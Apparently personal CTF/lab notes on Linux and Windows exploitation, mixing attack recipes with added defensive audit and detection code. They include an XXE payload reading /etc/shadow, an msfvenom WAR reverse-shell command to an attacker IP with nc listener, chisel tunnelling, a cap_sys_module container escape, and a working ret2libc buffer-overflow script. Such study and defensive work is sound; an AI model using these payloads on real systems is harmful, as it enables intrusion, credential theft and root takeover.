• Escalation Basics SUID / SUDO

    • Find SUID binaries: find / -perm -4000 2>/dev/null
    • Find what I can run with sudo: sudo -l
    • Bingo, there is an executable we can run with sudo without a password:
    •   (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
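Added example (mine, not from these notes): the defensive counterpart of the two checks above, written as a small Python audit that lists setuid binaries outside an expected baseline and flags sudo NOPASSWD rules that hand an interpreter or shell-capable tool to root. The baseline set, the list of shell-capable programs and the sample sudo -l output are constructed assumptions.

```python
import os
import stat

# Hypothetical baseline of setuid binaries a stock install is expected to carry;
# anything outside it deserves a look (deliberately short, constructed list).
SUID_BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
}

# Programs that give an interactive shell or arbitrary code execution when run as
# root, so a NOPASSWD rule naming one is effectively "root without a password".
SHELL_CAPABLE = {"python", "perl", "ruby", "bash", "sh", "vim", "vi", "less",
                 "more", "find", "awk", "env"}


def is_suid(mode):
    """True for a regular file with the setuid bit (what `find / -perm -4000` matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def unexpected_suid(entries, baseline=SUID_BASELINE):
    """entries: iterable of (path, st_mode). Returns setuid paths outside the baseline."""
    return sorted(path for path, mode in entries
                  if is_suid(mode) and path not in baseline)


def scan_filesystem(root="/"):
    """Yield (path, st_mode) for every file under root, skipping what we cannot stat."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


def risky_sudo_rules(sudo_l_output):
    """Parse `sudo -l` output lines such as
         (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
    and return (runas, command) for rules that run a shell-capable program
    without a password. Version suffixes (python3.8 -> python) are ignored."""
    findings = []
    for line in sudo_l_output.splitlines():
        runas, sep, command = line.strip().partition("NOPASSWD:")
        command = command.strip()
        if not sep or not command:
            continue
        program = os.path.basename(command.split()[0]).rstrip("0123456789.")
        if program in SHELL_CAPABLE:
            findings.append((runas.strip(), command))
    return findings


# Constructed sample of `sudo -l` output (not taken from a real host).
SAMPLE_SUDO_L = """\
Matching Defaults entries for bob on box:
    env_reset, mail_badpass
User bob may run the following commands on box:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
    (root) /usr/bin/systemctl restart nginx
    (ALL) NOPASSWD: /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    for path in unexpected_suid(scan_filesystem("/usr")):
        print("unexpected setuid binary:", path)
    for runas, command in risky_sudo_rules(SAMPLE_SUDO_L):
        print("risky NOPASSWD rule:", runas, command)
```

The fix on the defending side is the mirror image of the finding: drop the NOPASSWD tag, or better, never point a sudoers rule at an interpreter; wrap the script in a non-writable binary with a fixed argument list instead.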
      
  • XXE (XML External Entity)

    • if the remote server parses XML that we supply…
    • we can use an external entity to read internal files
    • https://github.com/payloadbox/xxe-injection-payload-list
    • <?xml version="1.0" ?>
      <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
      <userInfo>
       <firstName>John</firstName>
       <lastName>&ent;</lastName>
      </userInfo>
      
    • the &ent; reference is replaced with the content of the file
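Added example (mine, not from these notes): the server-side fix for the payload above. It assumes the consuming application is written in Python and uses the standard library expat parser; the parser refuses any DOCTYPE outright (entities can only be declared inside one) and, as a second line of defence, refuses to fetch external entities even if a DTD slipped through. Both sample documents are constructed.

```python
import xml.parsers.expat as expat

# Constructed sample documents: a benign one and the shape of the payload above.
BENIGN_DOC = """<?xml version="1.0"?>
<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>"""

XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>"""


class DtdNotAllowed(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and may therefore declare entities)."""


def parse_user_info(xml_text):
    """Parse <userInfo> into a dict using a parser that refuses any DTD.

    External entities can only be declared inside a DOCTYPE, so rejecting the
    DOCTYPE closes the file-read and SSRF paths that XXE relies on.
    """
    parser = expat.ParserCreate()
    fields, chunks = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE %r rejected in untrusted input" % name)

    def external_entity(context, base, sysid, pubid):
        # Belt and braces: never fetch anything, whatever the DTD says.
        raise DtdNotAllowed("external entity %r rejected" % sysid)

    def start(name, attrs):
        del chunks[:]

    def data(text):
        chunks.append(text)

    def end(name):
        if name in ("firstName", "lastName"):
            fields[name] = "".join(chunks)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = start
    parser.CharacterDataHandler = data
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return fields


def rejects(xml_text):
    """True if the hardened parser refuses the document."""
    try:
        parse_user_info(xml_text)
    except DtdNotAllowed:
        return True
    return False


if __name__ == "__main__":
    print(parse_user_info(BENIGN_DOC))
    print("payload rejected:", rejects(XXE_DOC))
```

Failing loudly is deliberate: a parser that silently drops the entity still accepts a document that was trying to read /etc/shadow, and the rejection is what should end up in the application log.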
  • Port discovery

    • nmap sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
      • 80, 135, 445, 5985
    • nmap nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports
  • Reverse tunnel with chisel

    • to install chisel
        1. git clone git@github.com:jpillora/chisel.git
        2. CGO_ENABLED=0 go build to build chisel as a static binary
    • In the attacker box: ./chisel server -p 9090 --reverse
    • In the victim box: ./chisel client 10.10.14.6:9090 R:8086:127.0.0.1:8086 (the client takes the server port as part of the address and it must match the server's -p; the victim's 127.0.0.1:8086 is then reachable as port 8086 on the attacker box)
  • SQL injection with sqlmap

    • sqlmap can automate part of a SQL injection: capture a request and let sqlmap try the different parameters
      1. First we save the request to a file with Burp Suite…
      2. sqlmap -r $(pwd)/request_file
  • WAR upload reverse shell

    • if we are in a Tomcat environment
      • there is the manager/html and manager/text interface
      • that allow uploading new applications
      • we can create a malicious WAR file https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
      • msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war
      • now open an nc listener
        • sudo nc -nvlp 4242 -vvv
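Added example (mine, not from these notes): what this technique looks like from the blue-team side. A WAR deployment through the manager leaves a POST to /manager/html/upload or a PUT to /manager/text/deploy in Tomcat's access log, so the detector below parses AccessLogValve "common" format lines and reports every accepted deployment that did not come from a trusted address. The log lines, IPs and the trusted-address list are constructed; the endpoint paths assume Tomcat's default manager application.

```python
import re

# Constructed Tomcat access-log lines (AccessLogValve "common" pattern); not real traffic.
ACCESS_LOG = """\
127.0.0.1 - admin [12/Oct/2021:10:01:02 +0000] "GET /manager/html HTTP/1.1" 200 1234
10.0.0.5 - deployer [12/Oct/2021:10:01:09 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=XYZ HTTP/1.1" 302 -
10.0.0.5 - deployer [12/Oct/2021:10:01:10 +0000] "GET /reverse/ HTTP/1.1" 200 0
192.168.1.5 - - [12/Oct/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 500
10.0.0.5 - deployer [12/Oct/2021:10:03:00 +0000] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 30
127.0.0.1 - admin [12/Oct/2021:10:04:00 +0000] "PUT /manager/text/deploy?path=/staging HTTP/1.1" 200 30
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Manager endpoints that create or replace a web application, with the method each uses.
DEPLOY_ENDPOINTS = {"/manager/html/upload": "POST", "/manager/text/deploy": "PUT"}


def parse_line(line):
    """Split one common-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def deploy_events(log_text, trusted_ips=frozenset({"127.0.0.1"})):
    """Return (ip, user, timestamp, path) for every application deployment that was
    accepted (2xx/3xx) and did not come from a trusted address."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if DEPLOY_ENDPOINTS.get(path) != rec["method"]:
            continue
        if rec["ip"] in trusted_ips or not rec["status"].startswith(("2", "3")):
            continue
        events.append((rec["ip"], rec["user"], rec["ts"], path))
    return events


if __name__ == "__main__":
    for ip, user, ts, path in deploy_events(ACCESS_LOG):
        print("deployment from %s as %s at %s via %s" % (ip, user, ts, path))
```

The same trusted-address list is what belongs in a RemoteAddrValve on the manager context, so that a deployment from anywhere else is refused rather than merely logged.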
  • Linux process pooling

  • Juicy Potato — Windows escalation

    • run whoami /priv; if SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled…
    • then we can use Juicy Potato https://github.com/ohpe/juicy-potato to get administrator access
  • Escaping Docker container

    • capsh to see which capabilities we have
    • capsh --print shows that I have cap_sys_module
    • with this capability we can insert new kernel modules; we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module
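Added example (mine, not from these notes): the audit side of the capsh check. It decodes the CapEff bitmask from /proc/self/status, reports which capabilities exceed Docker's default set and which of them are known container-escape enablers such as cap_sys_module. The capability bit numbers follow the kernel's capability.h; the Docker default mask and the "escape" set are my assumptions, and the sample status text is constructed.

```python
import re

# Linux capability names in bit order (include/uapi/linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]

# Capabilities that let a process escape a container or take over the host (assumed set).
ESCAPE_CAPS = {"cap_sys_module", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_rawio",
               "cap_dac_read_search", "cap_sys_boot"}

# Docker's default effective set for an unprivileged container (assumed value).
DOCKER_DEFAULT = 0x00000000A80425FB


def decode_caps(mask):
    """Expand a capability bitmask into names, lowest bit first."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def parse_capeff(status_text):
    """Pull the effective capability set out of /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)


def beyond_docker_default(mask):
    """Capabilities present that a default Docker container would not have."""
    return decode_caps(mask & ~DOCKER_DEFAULT)


def escape_risks(mask):
    """Capabilities in the set that are known container-escape enablers."""
    return sorted(set(decode_caps(mask)) & ESCAPE_CAPS)


def audit_self():
    """Run the check against the current process (inside the container to be audited)."""
    with open("/proc/self/status") as f:
        mask = parse_capeff(f.read())
    return {"extra": beyond_docker_default(mask), "risky": escape_risks(mask)}


if __name__ == "__main__":
    print(audit_self())
```

Anything the audit lists under "risky" is a capability to drop from the container spec (cap_drop) rather than something to live with; cap_sys_module in particular has no legitimate use inside an application container.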
  • Buffer overflow - linux

    • let's copy the binary to our machine to work on it more comfortably :)

    • install gef for gdb

      • checksec inside gdb shows the binary's protections
      • NX is enabled, meaning we cannot execute code on the stack
      • pattern create <length> generates a cyclic pattern
      • run "<pattern here>"
      • pattern offset $eip shows the offset to EIP is 52 bytes
    • ret2libc: since NX is active (stack execution protection) we need to return into libc instead

      • we need the addresses of system, exit and a "/bin/sh" string
      • on the victim machine we can first get the base address of libc
        • ldd <binary> 0xb7e1900
      • get the offsets of system and exit
        • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
        • we get the value of system@@GLIBC_2.0 0003ada0
        • exit 0002e9d0
        • to get the offset of a /bin/sh occurrence:
          • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh 15ba0b
      • to get the full address of the
      • ret2libc chain = addr_of_system + addr_of_exit + addr_of_bin_sh (each one is libc base + offset)
    • is ASLR active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes)

      buffer overflow script, after s4vitar

      from struct import pack
      from subprocess import call

      # padding up to the saved EIP; bytes so it concatenates with pack() on Python 3
      RELLENO = b"A" * 52

      base = 0xb7e19000          # libc base from ldd (ASLR disabled)
      system_off = 0x0003ada0    # readelf -s libc.so.6 | grep system
      exit_off = 0x0002e9d0      # readelf -s libc.so.6 | grep exit
      sh_off = 0x15ba0b          # strings -a -t x libc.so.6 | grep bin/sh

      system = base + system_off
      _exit = base + exit_off
      sh = base + sh_off

      # ret2libc chain: EIP -> system, return address -> exit, argument -> "/bin/sh"
      payload = RELLENO + pack("<I", system) + pack("<I", _exit) + pack("<I", sh)

      call(["/home/ayush/.binary/rop", payload])
      print(payload)
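Added example (mine, not from these notes): a pure-Python version of the two protection checks the notes rely on, checksec's NX/PIE/RELRO columns and the randomize_va_space sysctl. NX is read from the PF_X flag of the PT_GNU_STACK program header, PIE from e_type == ET_DYN and RELRO from a PT_GNU_RELRO header, which is what checksec itself looks at. The build_elf32 helper constructs header-only 32-bit ELF samples (not loadable binaries) so the checks can be exercised without the target; the field offsets follow the ELF specification.

```python
import struct

PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3


def elf_protections(data):
    """Return {'nx', 'pie', 'relro'} for an ELF image given as bytes.

    NX   : PT_GNU_STACK present without PF_X (no such header means the loader
           grants an executable stack, so it counts as NX off).
    PIE  : e_type == ET_DYN.
    RELRO: a PT_GNU_RELRO segment exists.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"
    e_type, = struct.unpack_from(end + "H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        e_phoff, = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)

    stack_flags, relro = None, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from(end + "II", data, off)
        else:
            p_type, = struct.unpack_from(end + "I", data, off)
            p_flags, = struct.unpack_from(end + "I", data, off + 24)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True
    nx = stack_flags is not None and not (stack_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def build_elf32(e_type, stack_flags, with_relro=False):
    """Constructed sample: a minimal little-endian ELF32 with only the headers we inspect."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0x4))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0,
                               52, 32, len(phdrs), 40, 0, 0)
    body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 4) for t, f in phdrs)
    return ehdr + body


ASLR_LEVELS = {
    0: "disabled",
    1: "stack, vdso and mmap randomized (brk not)",
    2: "full randomization (brk as well)",
}


def describe_aslr(level):
    """Human-readable meaning of a randomize_va_space value."""
    return ASLR_LEVELS.get(level, "unknown value %r" % level)


def aslr_level(path="/proc/sys/kernel/randomize_va_space"):
    """Read the live sysctl on a Linux host."""
    with open(path) as f:
        return int(f.read().strip())


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(elf_protections(f.read()))
    print("ASLR:", describe_aslr(aslr_level()))
```

On the hardening side the three flags map to linker options (-z noexecstack, -pie, -z relro -z now), and randomize_va_space=2 is the kernel default; the ret2libc chain above only works at all because the notes' target had it set to 0.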
      
